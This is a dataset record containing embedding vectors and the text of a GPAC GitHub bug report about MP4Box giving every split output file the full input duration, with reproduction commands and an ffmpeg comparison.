-0.0004512737214099616, -0.0077481744810938835, -0.029010774567723274, -0.0072670551016926765, 0.0034970908891409636, -0.007152161095291376, 0.002398415468633175, -0.008731955662369728, -0.0033175686839967966, -0.0010250712512061, 0.006200694013386965, -0.014498205855488777, 0.005561595316976309, 0.004477281589061022, 0.009091000072658062, -0.012860964052379131, 0.002218893263489008, 0.021097438409924507, -0.0016659651882946491, -0.026597997173666954, 0.0009909620275720954, -0.012717346660792828, 0.020522968843579292, 0.004775288049131632, 0.014921878464519978, -0.013320541009306908, -0.003924353513866663, 0.009923982433974743, -0.006925963331013918, 0.009055095724761486, -0.014131980948150158, -0.013062029145658016, 0.005331806838512421, 0.012868145480751991, -0.003978210035711527, 0.023065000772476196, 0.005206141155213118, -0.0027502786833792925, -0.0034773433580994606, 0.012717346660792828, 0.0028202924877405167, -0.002147084567695856, 0.005676489323377609, -0.003351677907630801, -0.014663366600871086, 0.008559614419937134, -0.015740498900413513, -0.011826916597783566, 0.017406463623046875, -0.01648731157183647, -0.011051381006836891, -0.003378606168553233, 0.019948497414588928, 0.025506502017378807, -0.0058631920255720615, -0.029815033078193665, 0.008143123239278793, 0.021916059777140617, 0.017736785113811493, -0.007841525599360466, 0.017679337412118912, -0.003687384305521846, 0.001384115545079112, -0.000785409240052104, 0.00903355237096548, 0.00005828858775203116, -0.005575956776738167, 0.004678346216678619, 0.01102983858436346, 0.019862325862050056, -0.022504892200231552, 0.006516652647405863, 0.025434693321585655, 0.04216615483164787, 0.010907763615250587, 0.020925097167491913, -0.011209361255168915, -0.009342330507934093, 0.0023499445524066687, 0.014268417842686176, -0.006480748299509287, -0.01541017834097147, -0.009895258583128452, 0.018138915300369263, 0.007927696220576763, 0.005683670286089182, 0.02162882499396801, -0.015898479148745537, -0.009055095724761486, 0.003938714973628521, 0.002260183449834585, -0.02160010114312172, 0.013658042065799236, 0.0025922993663698435, 0.005417977459728718, 0.013880649581551552, 0.00904073379933834, 0.0023571252822875977, 0.023869261145591736, -0.0027161696925759315, -0.004900953732430935, 0.011733565479516983, -0.018957534804940224, 0.008329826407134533, -0.0007486072136089206, 0.0024881765712052584, 0.005048161838203669, -0.0156256053596735, -0.01566869020462036, 0.004746564663946629, 0.00019163986144121736, -0.005856011528521776, -0.007313731126487255, 0.02167190983891487, 0.004685527179390192, 0.0505821518599987, 0.006466386374086142, 0.010958029888570309, -0.014677728526294231, 0.014210970140993595, -0.004222359973937273, -0.014763899147510529, -0.00548978615552187, -0.001264733262360096, -0.002567166229709983, 0.020968183875083923, 0.003935124725103378, -0.027775662019848824, 0.003462981665506959, 0.006369444541633129, -0.008976105600595474, -0.007755355443805456, 0.00980190746486187, 0.00938541628420353, 0.003906401339918375, 0.012853783555328846, 0.019072430208325386, -0.01441921666264534, -0.023926706984639168, -0.020163923501968384, -0.003877677721902728, -0.007249102927744389, 0.00783434510231018, -0.01762189157307148, 0.01999158225953579, 0.003931534476578236, 0.024572987109422684, -0.014455121010541916, 0.010692337527871132, 0.026167143136262894, -0.027790023013949394, -0.02488894574344158, -0.019072430208325386, 0.01042664423584938, -0.004470100626349449, 0.009679832495748997, 0.011783831752836704, 0.003726879134774208, -0.008243655785918236, -0.0028059305623173714, -0.00015214498853310943, -0.004958400968462229, -0.012128514237701893, 0.005924229975789785, -0.012501919642090797, -0.02636820822954178, -0.00878222193568945, -0.010864678770303726, -0.019101152196526527, -0.005755478981882334, -0.0011040610261261463, 0.010548719204962254, 0.012243407778441906, 0.016228798776865005, -0.02487458474934101, -0.020321903750300407, 0.005978086497634649, -0.029700137674808502, -0.002935186494141817, 0.007863068953156471, 0.005798564292490482, -0.009600842371582985, -0.0045885853469371796, -0.00650947168469429, -0.008796583861112595, 0.0013248731847852468, -0.00479683093726635, -0.00189934391528368, 0.029369818046689034, 0.002877739490941167, -0.002269159536808729, 0.011704841628670692, -0.005672898609191179, 0.03400867059826851, 0.016602205112576485, 0.005378482397645712, -0.002915439195930958, -0.03038950264453888, 0.01278915535658598, 0.02086765132844448, -0.0020806612446904182, -0.031854402273893356, -0.013342083431780338, -0.026641082018613815, 0.02198786847293377, -0.003540176199749112, -0.023309150710701942, 0.00781280267983675, 0.008660146966576576, 0.007985143922269344, -0.027746938169002533, 0.006566918920725584, 0.00509483739733696, 0.026167143136262894, -0.002689241198822856, -0.025434693321585655, 0.017377739772200584, 0.027057573199272156, -0.0038166402373462915, -0.0012710165465250611, -0.036708682775497437, 0.03191184997558594, 0.003620960982516408, 0.004541909322142601, 0.0015385044971480966, -0.0036532750818878412, -0.03283100575208664, 0.015309645794332027, -0.00370892696082592, 0.005238455254584551, 0.0002760152565315366, -0.025765012949705124, 0.03248632326722145, 0.004875820595771074, 0.005996038671582937, -0.0013859106693416834, 0.005572366528213024, -0.015769222751259804, -0.00452036689966917, -0.011352978646755219, 0.012473196722567081, 0.005040980875492096, -0.01839742623269558, -0.002913643838837743, -0.009708556346595287, 0.0009757027146406472, 0.005636994261294603, -0.0007064195233397186, 0.00609298050403595, -0.009880897589027882, -0.019919773563742638, -0.017708061262965202, -0.0004995202762074769, -0.000581202853936702, -0.0180240198969841, -0.006139656528830528, 0.01357187144458294, 0.0034683672711253166, 0.00325653119944036, -0.020221371203660965, -0.012171599082648754, 0.003085985081270337, 0.016975611448287964, -0.006832611747086048, -0.0010699518024921417, -0.023797450587153435, 0.003556333016604185, 0.00838727317750454, 0.0003520877507980913, -0.017449550330638885, 0.007611737586557865, -0.006671041715890169, 0.005859601777046919, -0.011647394858300686, -0.02247616834938526, 0.010699518024921417, -0.01800965890288353, -0.003321159165352583, 0.0010008357930928469, 0.00709112361073494, 0.0037663739640265703, 0.010462548583745956, 0.01762189157307148, 0.020293179899454117, -0.0252192672342062, -0.005733936559408903, 0.01342107355594635, 0.00919871311634779, 0.002123746555298567, 0.013356445357203484, -0.009320788085460663, -0.03271611034870148, 0.01717667654156685, 0.0010367402574047446, 0.0076260995119810104, 0.02600916475057602, -0.006283273920416832, 0.0082005700096488, 0.017147952690720558, -0.012013619765639305, -0.019905412569642067, 0.017822954803705215, 0.019086791202425957, 0.0029100535903126, 0.0058201071806252, 0.013543148525059223, -0.006829021032899618, 0.011726384051144123, -0.009047914296388626, 0.008372911252081394, -0.018971897661685944, -0.02002030611038208, -0.012372664175927639, 0.009392596781253815, 0.007335273548960686, 0.000216324144275859, -0.013478520326316357, 0.005184598732739687, 0.0007566857384517789, -0.01844051107764244, -0.009758821688592434, 0.008703231811523438, 0.021858612075448036, 0.002753869164735079, -0.01806710474193096, 0.030906526371836662, 0.009205893613398075, 0.008516528643667698, 0.0008805559482425451, 0.010706698521971703, -0.014268417842686176, 0.016903802752494812, 0.014096076600253582, -0.028680453076958656, -0.03484165295958519, -0.03291717544198036, 0.0017054601339623332, -0.016128266230225563, 0.002147084567695856, -0.0026461558882147074, -0.006283273920416832, 0.003920762799680233, -0.0044808718375861645, 0.006610004231333733, -0.0003559025935828686, 0.015237837098538876, -0.004692708142101765, -0.012652718462049961, 0.027430979534983635, 0.010333293117582798, -0.013866287656128407, 0.013543148525059223, -0.015812307596206665, 0.03555973991751671, -0.007920515723526478, -0.027517149224877357, -0.01638677902519703, 0.004997895564883947, -0.010046057403087616, -0.009744460694491863, -0.00391717255115509, 0.009241798892617226, 0.007819983176887035, 0.012710165232419968, 0.009213075041770935, -0.0034486197400838137, 0.012466015294194221, -0.0196468997746706, 0.00711266603320837, 0.005633404012769461, 0.006337130442261696, -0.0016533986199647188, 0.004649622831493616, -0.010828773491084576, 0.012904049828648567, 0.011618671007454395, 0.002369691850617528, 0.006592052057385445, 0.03311824053525925, 0.00022900289332028478, -0.002689241198822856, -0.026253314688801765, -0.01759316772222519, -0.016501672565937042, 0.013665223494172096, 0.009722917340695858, 0.01681763119995594, -0.043085306882858276, 0.009967068210244179, 0.01925913244485855, 0.006017581094056368, -0.013241550885140896, -0.02441500686109066, 0.020235732197761536, -0.005615451838821173, 0.0018284327816218138, 0.0035778756719082594, -0.009119722992181778, -0.002698217285797, 0.00419363658875227, -0.006624366156756878, 0.007403491996228695, 0.005206141155213118, 0.00942850112915039, 0.011453511193394661, 0.028263961896300316, 0.040988489985466, 0.005249226465821266, -0.014670547097921371, 0.016975611448287964, 0.028508111834526062, -0.0020896373316645622, -0.019431473687291145, -0.02042243629693985, -0.01443357765674591, 0.02517618052661419, -0.0029710910748690367, 0.024673519656062126, 0.02524799108505249, 0.0049619912169873714, 0.002446886384859681, 0.00027870808844454587, 0.0073065501637756824, 0.0037376503460109234, 0.01220750343054533, 0.0116402143612504, 0.008875573053956032, -0.01158994808793068, -0.005145103670656681, -0.005281540565192699, -0.02277776598930359, 0.005676489323377609, 0.007177294231951237, 0.0010879039764404297, 0.020537329837679863, 0.03846081718802452, -0.015108580701053143, 0.027933640405535698, 0.0018831869820132852, -0.010505634360015392, 0.005945772398263216, 0.0075901951640844345, 0.02128414250910282, 0.009715736843645573, 0.0010134023614227772, -0.002753869164735079, -0.007970781996846199, 0.019014982506632805, -0.0030841899570077658, 0.005109199322760105, 0.008114399388432503, 0.0028059305623173714, -0.02208840101957321, 0.008337006904184818, -0.0019208865705877542, 0.01323437038809061, 0.0007665594457648695, -0.0007562368991784751, -0.016903802752494812, 0.0023014734033495188, 0.023093724623322487, 0.027689490467309952, -0.018339978531003, -0.00003063095937250182, -0.0037771451752632856, 0.006735669914633036, 0.002585118403658271, -0.021097438409924507, 0.016616566106677055, -0.004900953732430935, -0.0034396436531096697, 0.002296087797731161, -0.014189427718520164, -0.003992571961134672, -0.002191965002566576, 0.003094961168244481, -0.004272626247256994, 0.007942058145999908, 0.006057076156139374, -0.017765508964657784, 0.004854278173297644, 0.009134084917604923, -0.013105113990604877, -0.01360777672380209, 0.014354588463902473, 0.0017512382473796606, 0.0066459085792303085, -0.003075213870033622, 0.00822211243212223, 0.0076260995119810104, 0.00901200994849205, -0.020724032074213028, -0.005766250193119049, -0.008746317587792873, -0.004829145036637783, -0.008315464481711388, -0.02766076661646366, -0.008114399388432503, 0.0021111799869686365, -0.0013365421909838915, -0.006566918920725584, -0.029082583263516426, -0.00904073379933834, -0.007798440754413605, -0.012257769703865051, 0.015826670452952385, -0.011123190633952618, -0.011360159143805504, 0.007949239574372768, -0.01543890219181776, 0.00741785392165184, 0.0005439519882202148, 0.01197771541774273, 0.01960381492972374, 0.01795221120119095, 0.00983063131570816, 0.01245165430009365, -0.01462746225297451, -0.01565432921051979, 0.026224590837955475, 0.00005727877578465268, 0.009256159886717796, -0.002247616881504655, 0.002482790732756257, 0.002191965002566576, 0.004452148452401161, -0.017004335299134254, 0.0069510964676737785, 0.003988981246948242, 0.01102983858436346, -0.002285316586494446, 0.006994181778281927, -0.019503282383084297, -0.010484091937541962, 0.013550329022109509, 0.018699023872613907, 0.009909620508551598, -0.0017117434181272984, 0.0037053364794701338, 0.004028476309031248, 0.02916875295341015, -0.018124552443623543, 0.0026551319751888514, 0.008401635102927685, 0.0006727591389790177, 0.0022440264001488686, -0.005834468640387058, -0.012896868400275707, 0.006915191654115915, -0.021686270833015442, 0.0041002850048244, -0.017061781138181686, -0.005234865006059408, -0.04776724427938461, -0.017736785113811493, 0.000408188410801813, 0.004261855036020279, 0.005292311776429415, 0.0057052127085626125, 0.00019612790492828935, -0.020896373316645622, 0.030504398047924042, 0.01022558007389307, 0.004527547862380743, 0.012882506474852562, -0.02477405220270157, 0.010692337527871132, 0.016128266230225563, 0.017535720020532608, 0.008696051314473152, -0.014139161445200443, 0.012896868400275707, -0.004369568079710007, 0.007841525599360466, 0.010132228024303913, -0.0015268356073647738, -0.002220688620582223, -0.003461186308413744, -0.027344807982444763, -0.03084908053278923, 0.0109867537394166, 0.009658290073275566, 0.02839321829378605, 0.009507491253316402, -0.00479324022307992, 0.0034324629232287407, 0.0007257181569002569, 0.00540002528578043, 0.0023732823319733143, 0.003037514165043831, -0.022591063752770424, 0.008308283053338528, 0.002182988915592432, -0.0012853783555328846, -0.0036837938241660595, 0.047077879309654236, 0.012746070511639118, 0.018727747723460197, 0.020135199651122093, -0.004854278173297644, 0.005155875347554684, -0.0018383064307272434, -0.005859601777046919, -0.00551851000636816, 0.01563996635377407, -0.003576080547645688, 0.004265445284545422, 0.015266560949385166, -0.0027610501274466515, -0.00038148448220454156, 0.008272378705441952, -0.0018831869820132852, -0.004976353142410517, -0.014167885296046734, -0.015812307596206665, -0.03676613047719002, -0.017794232815504074, 0.01720539852976799, -0.026253314688801765, -0.0042869881726801395, -0.013658042065799236, 0.009550576098263264, -0.017076143994927406, 0.016630928963422775, -0.013478520326316357, 0.01963253878057003, -0.00801386684179306, -0.004265445284545422, -0.006574099883437157, 0.004272626247256994, -0.011496596038341522, 0.01223622728139162, 0.014052990823984146, 0.010354835540056229, 0.001157917664386332, 0.008243655785918236, 0.008114399388432503, -0.01599901169538498, -0.014052990823984146, 0.010469730012118816, -0.0076045566238462925, -0.008171847090125084, -0.012178780511021614, 0.010168132372200489, 0.01018967479467392, -0.004628079943358898, 0.0063802157528698444, -0.008933020755648613, -0.003698155516758561, -0.012063886038959026, 0.009335150010883808, 0.010900583118200302, -0.017363378778100014, -0.011417606845498085, 0.0032224219758063555, -0.017851678654551506, -0.008530890569090843, -0.006459205877035856, 0.013298998586833477, -0.016616566106677055, -0.011101647280156612, 0.013679585419595242, 0.024515539407730103, -0.01404581032693386, 0.01281787920743227, 0.02042243629693985, -0.005536462180316448, -0.02040807344019413, 0.00006855500396341085, -0.011668937280774117, -0.0052635883912444115, 0.016918163746595383, -0.015726137906312943, 0.0018742108950391412, -0.0052276840433478355, 0.0034198963548988104, -0.0008123375591821969, 0.009536215104162693, -0.003376811044290662, 0.009536215104162693, -0.01769370026886463, -0.017076143994927406, -0.03923635184764862, -0.02043679729104042, 0.016271883621811867, 0.019072430208325386, 0.017708061262965202, -0.020996905863285065, -0.012523462995886803, 0.007633280474692583, -0.002635384676977992, -0.007310140412300825, -0.005367711186408997, 0.007712270133197308, 0.005037390626966953, 0.02847938798367977, 0.008293922059237957, -0.024630434811115265, 0.008329826407134533, 0.012164418585598469, -0.00006816230597905815, 0.017392102628946304, 0.002127337036654353, -0.008897116407752037, 0.010864678770303726, 0.014692089520394802, -0.016286246478557587, -0.009471586905419827, 0.0014119414845481515, 0.021355951204895973, 0.007985143922269344, -0.009550576098263264, -0.007561471313238144, 0.004315711557865143, -0.002443295903503895, 0.0008302897913381457, -0.014864430762827396, 0.036622513085603714, 0.014921878464519978, 0.02323734201490879, -0.009306426160037518, -0.01184845995157957, 0.03277355805039406, 0.009902440011501312, 0.007076761685311794, 0.0044665103778243065, -0.02365383319556713, 0.02879534661769867, 0.006775164511054754, 0.001038535381667316, 0.006315588019788265, -0.020135199651122093, 0.028551196679472923, 0.009471586905419827, 0.000279605679679662, -0.008631423115730286, 0.0631343349814415, -0.014591557905077934, 0.00491172494366765, -0.0020950231701135635, 0.015209113247692585, 0.015395816415548325, 0.008609880693256855, -0.014153523370623589, -0.014749537222087383, 0.014124799519777298, 0.015812307596206665, 0.019000621512532234, -0.00799950584769249, -0.005733936559408903, -0.0036101897712796926, 0.003640708513557911, 0.0067895264364778996, -0.011094466783106327, -0.0232086181640625, 0.009248979389667511, 0.009521853178739548, 0.0010816206922754645, 0.01721976138651371, 0.017334654927253723, 0.019431473687291145, 0.0002782592782750726, -0.003863315796479583, 0.018971897661685944, 0.006100161466747522, -0.01808146759867668, -0.011510957963764668, -0.0091699892655015, -0.0010223784483969212, 0.005274359602481127, 0.013069209642708302, 0.017521359026432037, -0.019115515053272247, 0.00003068706064368598, 0.022763404995203018, 0.002145289210602641, 0.014246875420212746, -0.016214437782764435, 0.02241872251033783, 0.045440636575222015, -0.0010412283008918166, -0.0015259379288181663, -0.018282532691955566, 0.014936239458620548, 0.004067970905452967, 0.012702984735369682, 0.004107465967535973, 0.008135941810905933, 0.00470347935333848, -0.007791259791702032, 0.01844051107764244, 0.03245759755373001, 0.018354341387748718, 0.03808741271495819, -0.0057411170564591885, -0.011862820945680141, -0.014792622067034245, -0.0016560915391892195, 0.005604680627584457 ]
3,013
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
<!-- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! --> - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 <!-- Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ --> ### Environment ~~~ C:\>MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev540-g741a7d1a-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: (static configuration file) Features: GPAC_CONFIG_WIN32 GPAC_64_BITS GPAC_MEMORY_TRACKING GPAC_HAS_SSL GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FAAD GPAC_HAS_MAD GPAC_HAS_LIBA52 GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_FFMPEG GPAC_HAS_OPENSVC GPAC_HAS_JP2 GPAC_HAS_OPENHEVC GPAC_HAS_THEORA GPAC_HAS_VORBIS GPAC_HAS_XVID GPAC_HAS_GLU ~~~ ### Steps to reproduce ~~~ MP4Box -lf GOPR0178-mp4box-bug-log.txt -logs all@debug -split-size 51200 GOPR0178.MP4 ~~~ #### Actual result ~~~ C:\>MP4Box -lf GOPR0178-mp4box-bug-log.txt -logs all@debug -split-size 51200 GOPR0178.MP4 [Console] Detected Windows shell, will use SetConsoleTextAttribute for coloring [Core] Open file GOPR0178-mp4box-bug-log.txt in mode wt [Core] file "GOPR0178-mp4box-bug-log.txt" opened in mode "wt" - 1 file handles ~~~ [GOPR0178-mp4box-bug-log.txt](https://github.com/gpac/gpac/files/6073276/GOPR0178-mp4box-bug-log.txt) Every output file has the same duration as the input file: ![actual](https://user-images.githubusercontent.com/9609370/109743685-b2b6c280-7c03-11eb-91a0-b571e8325971.png) #### Expected result The sum of durations of all output files equals to the duration of the input file: ![expected](https://user-images.githubusercontent.com/9609370/109743884-fc071200-7c03-11eb-822f-88f3dfc1db02.png) ### Additional information `ffmpeg` works OK: ~~~ ffmpeg -i GOPR0178.MP4 -codec copy -ss 00:00:00 -fs 52428800 GOPR0178_001.MP4 ffmpeg -i GOPR0178.MP4 -codec copy -ss 00:00:13 -fs 52428800 GOPR0178_002.MP4 ~~~
MP4Box sets wrong output duration when splits some files [bug]
https://api.github.com/repos/gpac/gpac/issues/1695/comments
3
2021-03-03T02:41:20
2021-03-09T15:44:24Z
https://github.com/gpac/gpac/issues/1695
820,582,863
1,695
false
This is a GitHub Issue repo:gpac owner:gpac Title : MP4Box sets wrong output duration when splits some files [bug] Issue date: --- start body --- <!-- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! --> - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 <!-- Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ --> ### Environment ~~~ C:\>MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev540-g741a7d1a-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: (static configuration file) Features: GPAC_CONFIG_WIN32 GPAC_64_BITS GPAC_MEMORY_TRACKING GPAC_HAS_SSL GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FAAD GPAC_HAS_MAD GPAC_HAS_LIBA52 GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_FFMPEG GPAC_HAS_OPENSVC GPAC_HAS_JP2 GPAC_HAS_OPENHEVC GPAC_HAS_THEORA GPAC_HAS_VORBIS GPAC_HAS_XVID GPAC_HAS_GLU ~~~ ### Steps to reproduce ~~~ MP4Box -lf GOPR0178-mp4box-bug-log.txt -logs all@debug -split-size 51200 GOPR0178.MP4 ~~~ #### Actual result ~~~ C:\>MP4Box -lf GOPR0178-mp4box-bug-log.txt -logs all@debug -split-size 51200 GOPR0178.MP4 [Console] Detected Windows shell, will use SetConsoleTextAttribute for coloring [Core] Open file GOPR0178-mp4box-bug-log.txt in mode wt [Core] file "GOPR0178-mp4box-bug-log.txt" opened in mode "wt" - 1 file handles ~~~ [GOPR0178-mp4box-bug-log.txt](https://github.com/gpac/gpac/files/6073276/GOPR0178-mp4box-bug-log.txt) Every output file has the same duration as the input file: ![actual](https://user-images.githubusercontent.com/9609370/109743685-b2b6c280-7c03-11eb-91a0-b571e8325971.png) #### Expected result The sum of durations of all output files equals to the duration of the input file: ![expected](https://user-images.githubusercontent.com/9609370/109743884-fc071200-7c03-11eb-822f-88f3dfc1db02.png) ### Additional information `ffmpeg` works OK: ~~~ ffmpeg -i GOPR0178.MP4 -codec copy -ss 00:00:00 -fs 52428800 GOPR0178_001.MP4 ffmpeg -i GOPR0178.MP4 -codec copy -ss 00:00:13 -fs 52428800 GOPR0178_002.MP4 ~~~ --- end body ---
2,757
[ -0.0036514238454401493, 0.013905718922615051, -0.011098596267402172, 0.007432740181684494, 0.005607028491795063, 0.013595419935882092, -0.011675897054374218, 0.06148247420787811, -0.03662969917058945, 0.05415076017379761, 0.009648130275309086, 0.03039485588669777, 0.003875127760693431, -0.04179653525352478, -0.013429446145892143, 0.0034205038100481033, 0.0008542239083908498, 0.012794416397809982, -0.010687270201742649, 0.009092478081583977, -0.011170758865773678, -0.011546004563570023, -0.003940073773264885, 0.041103776544332504, -0.028619658201932907, 0.0172901414334774, -0.03380092605948448, 0.018993176519870758, -0.007255942095071077, -0.003415091661736369, 0.004820456728339195, 0.02530018240213394, -0.003213036572560668, 0.03830387070775032, 0.04329751804471016, 0.03290611132979393, 0.05810526758432388, 0.04967668280005455, 0.0020512198098003864, -0.014143855310976505, -0.04390368238091469, -0.010449133813381195, -0.036225587129592896, -0.011704761534929276, -0.01395623292773962, 0.038101814687252045, -0.025603264570236206, 0.014771669171750546, -0.01489434577524662, -0.008933721110224724, 0.005751353222876787, -0.01589018851518631, -0.029312418773770332, -0.011596518568694592, 0.015601538121700287, -0.04090172052383423, 0.0515529103577137, 0.0049178763292729855, 0.005690015386790037, 0.03966052457690239, 0.015024238266050816, 0.018170524388551712, -0.02089826762676239, 0.03527304157614708, 0.018863284960389137, 0.015688132494688034, -0.032357677817344666, 0.0075914980843663216, -0.011697545647621155, 0.027984628453850746, 0.026454782113432884, -0.01194289792329073, 0.03619672358036041, 0.01814165897667408, 0.016871599480509758, -0.06506173312664032, 0.0468190461397171, 0.010701702907681465, -0.01789630763232708, 0.013949016109108925, -0.08180344104766846, 0.012303710915148258, -0.05980830267071724, 0.0040411013178527355, 0.02329406328499317, -0.008305907249450684, -0.015182996168732643, -0.046963371336460114, -0.01915193535387516, -0.02517028898000717, -0.013032552786171436, -0.0037813163362443447, 0.012267629615962505, -0.031982433050870895, -0.01952718012034893, -0.00881104450672865, -0.002350694267079234, 0.01176970824599266, -0.008782179094851017, -0.06650498509407043, -0.02452082745730877, -0.025314614176750183, -0.011849086731672287, -0.01866122893989086, 0.02579088695347309, -0.004726645536720753, 0.030943291261792183, -0.039458468556404114, 0.01438920758664608, 0.10639642924070358, 0.03154945746064186, 0.04609742388129234, -0.02615169994533062, -0.005758569575846195, 0.012231548316776752, 0.006209585350006819, 0.0007274884846992791, -0.034609146416187286, 0.00044425055966712534, 0.014418072998523712, 0.018819987773895264, 0.025949643924832344, -0.020364265888929367, 0.04349957033991814, -0.012873794883489609, 0.0704883560538292, -0.03755337744951248, 0.015442781150341034, -0.015139698050916195, -0.033598873764276505, -0.04803137853741646, 0.00289371726103127, 0.006494627334177494, -0.02174978516995907, -0.016063379123806953, -0.0011221272870898247, -0.02955777198076248, 0.03720699995756149, -0.02501153200864792, 0.020061181858181953, -0.009814104065299034, -0.052505455911159515, 0.05380437895655632, -0.00650906004011631, -0.02440536580979824, -0.03212675824761391, 0.01458404678851366, -0.004759118892252445, -0.01020378153771162, 0.018473606556653976, -0.016207704320549965, -0.0028702644631266594, -0.0035287474747747183, 0.03463801369071007, 0.042489297688007355, 0.01577472873032093, 0.008544043637812138, -0.015731431543827057, -0.011466625146567822, -0.029702095314860344, 0.006620911881327629, -0.017073653638362885, 0.0008894031634554267, -0.021374540403485298, -0.01420880202203989, -0.03201129660010338, 0.006851831916719675, 0.037120405584573746, 0.0022406463976949453, 0.01489434577524662, 0.00030375912319868803, -0.014995372854173183, 0.02825884521007538, 0.014187152497470379, -0.024708449840545654, -0.041594479233026505, 0.008551259525120258, 0.05308275669813156, -0.017362304031848907, -0.0017508433666080236, -0.02964436635375023, 0.0380152203142643, -0.020364265888929367, -0.004892619326710701, 0.0026808378752321005, -0.030192801728844643, 0.027984628453850746, -0.02551667019724846, 0.015312888659536839, -0.03616786003112793, 0.0011997020337730646, 0.012029493227601051, 0.023250766098499298, 0.005650325678288937, 0.02327963151037693, 0.013415013439953327, -0.02540121041238308, -0.01639532670378685, -0.037466783076524734, 0.016294298693537712, -0.0020927132572978735, -0.0065271006897091866, -0.0152118606492877, -0.04479849711060524, -0.035590559244155884, -0.004026669077575207, -0.0314917266368866, 0.016698408871889114, -0.007295631337910891, -0.01987355947494507, -0.03325249254703522, -0.01988799311220646, 0.037091538310050964, 0.01557267364114523, -0.019224097952246666, 0.021576596423983574, -0.018199389800429344, 0.01978696510195732, -0.0152118606492877, -0.023250766098499298, -0.009446075186133385, -0.0009290925227105618, -0.008356420323252678, -0.00017476861830800772, -0.01100478507578373, -0.012549063190817833, 0.016481921076774597, 0.0013178681256249547, -0.005278688855469227, 0.027479490265250206, 0.02540121041238308, 0.003636991372331977, -0.056633152067661285, 0.017593223601579666, -0.038246139883995056, 0.018949879333376884, -0.001839242409914732, 0.005560122895985842, 0.0029189742635935545, 0.0016371873207390308, -0.021071458235383034, 0.04396141320466995, -0.0033754021860659122, -0.002691662171855569, 0.027205273509025574, 0.02789803221821785, 0.001767079927958548, 0.012072790414094925, 0.0011518943356350064, 0.02075394243001938, 0.006960075814276934, -0.008479096926748753, -0.013783042319118977, 0.0018672053702175617, -0.009821319952607155, 0.010290375910699368, 0.04644380137324333, 0.012108871713280678, -0.016929328441619873, -0.04067080095410347, -0.005307553801685572, 0.013111931271851063, -0.032963842153549194, -0.016958193853497505, 0.02703208290040493, -0.026238294318318367, -0.040468744933605194, 0.013667582534253597, -0.013198526576161385, -0.012007844634354115, 0.00018130835087504238, -0.0050441608764231205, -0.024087851867079735, -0.0029514473862946033, -0.03590807318687439, -0.02029210329055786, 0.024823909625411034, 0.010391403920948505, 0.02916809357702732, 0.022601302713155746, -0.01649635285139084, 0.0626370757818222, -0.008789395913481712, 0.045375797897577286, -0.009474939666688442, -0.0030181976035237312, 0.03639877960085869, -0.013855204917490482, 0.0017751981504261494, 0.014165503904223442, 0.028460901230573654, 0.023755904287099838, 0.02866295538842678, 0.033339086920022964, -0.008594556711614132, 0.0010842420160770416, -0.00850074551999569, 0.012779983691871166, 0.00875331461429596, 0.003398854983970523, -0.031462863087654114, 0.03212675824761391, 0.023250766098499298, -0.017059221863746643, -0.01789630763232708, 0.009785238653421402, -0.04745407775044441, 0.0014712135307490826, -0.03368546813726425, -0.007952310144901276, -0.016712840646505356, -0.038707979023456573, -0.004106047563254833, 0.005892070475965738, -0.01612110808491707, -0.011690329760313034, -0.006545141339302063, -0.012534631416201591, -0.01270782109349966, -0.03905436024069786, 0.028720686212182045, -0.0009029335924424231, -0.044596441090106964, 0.03538850322365761, 0.03463801369071007, -0.019541611894965172, -0.031203076243400574, 0.021244648844003677, -0.03178037703037262, 0.012534631416201591, -0.002320025349035859, -0.010355322621762753, 0.01564483530819416, -0.04107490926980972, 0.010340889915823936, -0.030972156673669815, -0.02024880424141884, -0.01900761015713215, 0.03154945746064186, 0.006992548704147339, -0.012166602537035942, -0.00719099584966898, 0.0210425928235054, 0.0030669074039906263, -0.002545533236116171, -0.031203076243400574, -0.007706957869231701, 0.03241540864109993, 0.009193506091833115, 0.008024472743272781, 0.0009164640796370804, -0.00336096971295774, -0.01420880202203989, 0.03769770264625549, 0.0034295241348445415, -0.03489779680967331, 0.01627986691892147, 0.004777159076184034, 0.031462863087654114, 0.003561220830306411, 0.006786885671317577, -0.01941172033548355, 0.005213742610067129, 0.015962351113557816, -0.009806887246668339, 0.002419248688966036, -0.018747825175523758, -0.01114189438521862, -0.02675786428153515, -0.023929094895720482, -0.017679819837212563, 0.017217978835105896, -0.03729359433054924, 0.011704761534929276, -0.03538850322365761, 0.024188879877328873, 0.012267629615962505, 0.006224018055945635, -0.01727570965886116, 0.014995372854173183, -0.05917327105998993, 0.05019625276327133, 0.044365521520376205, -0.06431124359369278, 0.002733155619353056, -0.0005385128315538168, -0.02187967859208584, 0.02504039742052555, -0.021922975778579712, -0.020696213468909264, -0.018329281359910965, 0.0015136089641600847, -0.014980941079556942, -0.03290611132979393, -0.035099852830171585, 0.029615500941872597, -0.022572439163923264, 